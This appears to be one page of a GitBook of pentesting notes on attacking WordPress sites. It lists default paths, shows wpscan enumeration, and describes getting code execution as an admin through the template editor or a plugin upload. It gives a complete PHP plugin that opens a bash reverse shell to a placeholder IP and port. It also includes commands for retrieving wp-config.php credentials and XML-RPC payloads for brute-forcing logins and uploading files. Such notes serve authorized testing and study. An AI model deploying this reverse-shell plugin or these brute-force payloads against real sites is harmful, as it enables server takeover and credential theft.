📑
Security Notes
  • Readme
  • Resources
    • Useful sites
    • Metasploit
      • Searchsploit
      • Msfvenom
      • Meterpreter
    • Shells
    • Linux
      • Cron
      • Connection
      • Compilers
    • Windows
      • Kernel exploits table
    • Bruteforce
      • Checklist
      • John the Ripper
      • Hashcat
    • BOF
      • Assembly
    • Gaining access checklist
  • Cloud - AWS
    • Enumeration
    • References
    • Bucket S3
      • Public Bucket
      • AMI Files
      • File upload to RCE
    • EC2
      • cloud-init Exploits
      • SSRF To AWS Role compromise
      • Unencrypted EBS
    • IAM
      • Account Disclosure by resource policy
    • Lambda Function
      • Code Injection
      • Attacking APIs
    • VPC
      • Expose Resources
  • Networking
    • Nmap
      • Scan types
    • TCPDump
    • Port forwarding
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 25 465 587 - SMTP
      • 53 - DNS
      • 110 995 - POP3
      • 111 - NFS
      • 113 - Ident
      • 123 - NTP
      • 135 137 139 - RPC
      • 143 993 - IMAP
      • 161 - SNMP
      • 389 - LDAP
      • 139 445 - SMB
      • 873 - Rsync
      • 6379 - Redis
      • 6667 - IRC
  • Linux PrivEsc
    • Checklist
    • Enumeration
      • Important files
      • Memory Dump
    • Privileges Exploitation
    • Wildcard Exploits
    • Sudo Exploits
    • Docker Container
    • Docker Groups
    • Common Exploits
  • Windows PrivEsc
    • Checklist
    • Enumeration
      • Important Files
    • Antivirus evasion tools
    • Unquoted paths
    • Always install elevated
    • Vulnerable services
    • Client side
    • Exploitable privileges
      • Juicy Potato
    • UAC bypass
    • Common Exploits
  • Active Directory
    • Introduction
    • Checklist
    • Enumeration
    • Enable RDP
    • Kerberos
    • Rubeus
    • Credentials harvesting
      • Domain Controller specific
    • Connection
    • Pass The Hash
    • Kerberoast
    • ASREProast
    • Tickets
  • Web Attacks
    • Checklist
    • Enumeration
      • URL bruteforcing
    • APIs and Fields
    • Authentication
    • Filter Evasion
      • Fuzzying and encoding
    • File Vulnerabilities
      • LFI List
      • PHP shells
    • RCE
    • Code Injection
    • Dependency Injection
    • Joomla
    • Wordpress
    • WebDAV
    • HTTP
    • XSS
      • DOM Based
      • Reflected
      • Filter Evasion
    • SSI
    • SSTI
    • RCE
    • CSRF
    • SQL injection
      • sqlmap
      • PostgreSQL
      • Oracle
      • MSSQL
      • MySQL
      • Login
    • XPath injection
    • XXE
    • CORS
  • MOBILE PENTESTING
    • Static Code Analysis
    • Dynamic Code Analysis
    • Network Traffic Analysis
Powered by GitBook
On this page
  • Standard pages and folders
  • Plugin enumeration
  • Authenticated RCE
  • Template editor
  • Plugin upload functionality
  • Pivoting
  • XML-RPC
  • Check if active
  • Credentials bruteforce
  • File upload
  1. Web Attacks

Wordpress

Standard pages and folders

License files

  • /license.txt

  • /readme.html

Login pages

  • /wp-admin/login.php

  • /wp-admin/wp-login.php

  • /login.php

  • /wp-login.php

Resource folders

  • wp-content/uploads/ resources folder

  • wp-content/themes/ themes folder

  • wp-includes/ plugins, scripts and widgets

Plugin enumeration

Enumeration can be executed with the tool wpscan downloadable here

wpscan --update
wpscan --url <host> --enumerate u,p            #list users and installed lugins
wpscan --url <host> --enumerate ap,at,cb,dbe   #bruteforce installed plugins, better results but really

Authenticated RCE

These attacks require access to the administrative console

Template editor

It is possible to use the template editor to modify a php page. The best target is the 404 page since it can be triggered easily. If not possible the modified files are usually located under /wp-content/themes/<theme>/<page>.php

Plugin upload functionality

It is possible to upload and execute a reverse shell payload by abusing the install plugin functionality

Create a .php file as follows then zip it and upload the archive. Once uploaded press the "Activate" button

<?php

/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'");
?>

Pivoting

This file contains plain-text username and password for database login. Sometimes these credentials can also be used to authenticate as another user on target machine.

cat <wp folder>/wp-config.php    #local
wget <url>/wp-config.php         #remote

XML-RPC

Check if active

Send the following request to /xmlrpc.php

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Credentials bruteforce

You can use wp.getUsersBlogs, wp.getCategories or metaWeblog.getUsersBlogs as value for the methodName field

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>[user]</value></param>
<param><value>[pass]</value></param>
</params>
</methodCall>

File upload

Requires valid credentials

<?xml version='1.0' encoding='utf-8'?>
<methodCall>
	<methodName>wp.uploadFile</methodName>
	<params>
		<param><value><string>1</string></value></param>
		<param><value><string>[user]</string></value></param>
		<param><value><string>[pass]</string></value></param>
		<param>
			<value>
				<struct>
					<member>
						<name>name</name>
						<value><string>[filename]</string></value>
					</member>
					<member>
						<name>type</name>
						<value><string>[mime type]</string></value>
					</member>
					<member>
						<name>bits</name>
						<value><base64><![CDATA[base64 blob here]]></base64></value>
					</member>
				</struct>
			</value>
		</param>
	</params>
</methodCall>
PreviousJoomlaNextWebDAV

Last updated 2 years ago